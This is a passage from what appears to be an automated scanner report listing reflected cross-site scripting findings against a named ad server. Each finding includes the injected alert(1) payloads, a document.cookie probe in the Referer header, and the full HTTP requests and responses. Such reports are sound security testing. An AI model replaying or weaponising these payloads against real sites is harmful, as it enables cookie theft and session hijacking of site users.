<meta http-equiv="pragma" content
...[SNIP]...
0537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977fbf4f"><script>alert(1)</script>8f9396390d1&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTAN
...[SNIP]...

4.21. http://adserver.teracent.net/tase/ad [Targets parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Targets request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2713"-alert(1)-"cfdec192739 was submitted in the Targets parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977f2713"-alert(1)-"cfdec192739&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929627106_58540920_as2107_imp|285#1295929627106_58540920_as2107_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:06 GMT
Content-Length: 18418

<!DOCTYPE html>
<!-- Host: as2107 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
0537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977f2713"-alert(1)-"cfdec192739&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTAN
...[SNIP]...

4.22. http://adserver.teracent.net/tase/ad [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f765"-alert(1)-"eb22a847e48 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,439209f765"-alert(1)-"eb22a847e48&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929627468_58541793_as2104_imp|285#1295929627468_58541793_as2104_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:06 GMT
Content-Length: 18383

<!DOCTYPE html>
<!-- Host: as2104 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
1,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,439209f765"-alert(1)-"eb22a847e48&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295929627468_58541793_as2104_imp?q=H4sIAAAAAAAAAFVQy2rDQAz8Fcnap7v0uqfYpNBLMEsvLT
...[SNIP]...

4.23. http://adserver.teracent.net/tase/ad [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the Values request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45923"><script>alert(1)</script>d2ae93715fd was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,4392045923"><script>alert(1)</script>d2ae93715fd&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929627376_58541639_as2105_imp|285#1295929627376_58541639_as2105_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:07 GMT
Connection: close

<!DOCTYPE html>
<!-- Host: as2105 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
1,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,4392045923"><script>alert(1)</script>d2ae93715fd&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295929627376_58541639_as2105_imp?q=H4sIAAAAAAAAAFWQS2vDMBCEf0XvK-3q5YpedYpNCr2EIH
...[SNIP]...

4.24. http://adserver.teracent.net/tase/ad [adId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the adId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b73"><script>alert(1)</script>1b3a06602a6 was submitted in the adId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_73691725b73"><script>alert(1)</script>1b3a06602a6&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929622400_58540479_as2106_imp|285#1295929622400_58540479_as2106_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:02 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:01 GMT
Content-Length: 19124

<!DOCTYPE html>
<!-- Host: as2106 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<div id="t_73691725b73"><script>alert(1)</script>1b3a06602a6_shell" style="display:block;height:250px;position:relative;width:300px;">
...[SNIP]...

4.25. http://adserver.teracent.net/tase/ad [adId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the adId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffbe3"%3balert(1)//c59190afeff was submitted in the adId parameter. This input was echoed as ffbe3";alert(1)//c59190afeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917ffbe3"%3balert(1)//c59190afeff&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929622479_58477101_as2109_imp|285#1295929622479_58477101_as2109_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:02 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:02 GMT
Content-Length: 18342

<!DOCTYPE html>
<!-- Host: as2109 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<script type="text/javascript">
window.onload = function() {
t.render({
adId: "t_736917ffbe3";alert(1)//c59190afeff",
beaconUrl: "http://ad.doubleclick.net/ad/N2724.autotrader/B4323655.105;sz=1x1;pc=[TPAS_ID];ord=1295929622479?",
bgcolor: "#FFFFFF",
defaul
...[SNIP]...

4.26. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6f79"><script>alert(1)</script>36adda61ff3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&f6f79"><script>alert(1)</script>36adda61ff3=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929629211_58540734_as2106_imp|285#1295929629211_58540734_as2106_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:09 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:08 GMT
Content-Length: 19300

<!DOCTYPE html>
<!-- Host: as2106 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&f6f79"><script>alert(1)</script>36adda61ff3=1http://adserver.teracent.net/tase/redir/1295929629211_58540734_as2106_imp?q=H4sIAAAAAAAAAFWPu07DQBBFv4J-ZmefZkW7VWwFiSaKVjRIVEh-bJJyZezIiWK75HNpKVmjBEExI5153Lnz9fF5FywJw4UApSUid8082E2om261pK0bKrsB0iw
...[SNIP]...

4.27. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c3ae"-alert(1)-"9e56efdf5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&4c3ae"-alert(1)-"9e56efdf5e=1 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929629285_58665968_as2101_imp|285#1295929629285_58665968_as2101_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:09 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:08 GMT
Content-Length: 18662

<!DOCTYPE html>
<!-- Host: as2101 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=&4c3ae"-alert(1)-"9e56efdf5e=1http://adserver.teracent.net/tase/redir/1295929629285_58665968_as2101_imp?q=H4sIAAAAAAAAAFWRy2rDMBBFf2Wk0WPkim61ik0KXTQE0U2hi1LwQ0mWwrWDE2Jn3W_tT1QOSWgXEveIOw_NvHx__MTGAhKS4hJBKXSVZW4sw84upzqM8dy7obK
...[SNIP]...

4.28. http://adserver.teracent.net/tase/ad [rcu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the rcu request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbcfe"-alert(1)-"4a1deec2b00 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=clickcbcfe"-alert(1)-"4a1deec2b00&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929623767_58540794_as2107_imp|285#1295929623767_58540794_as2107_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:27:03 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:27:03 GMT
Content-Length: 18395

<!DOCTYPE html>
<!-- Host: as2107 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
eSvr: "http://pcdn.tcgmsrv.net/tase",
salign: "tl",
staticBeaconUrl: "",
staticClickUrl: "http://adserving.autotrader.com/event.ng/Type=clickcbcfe"-alert(1)-"4a1deec2b00&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,14119
...[SNIP]...

4.29. http://adserver.teracent.net/tase/ad [rcu parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The value of the rcu request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c96b6"><script>alert(1)</script>bc28d8f1d07 was submitted in the rcu parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=clickc96b6"><script>alert(1)</script>bc28d8f1d07&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

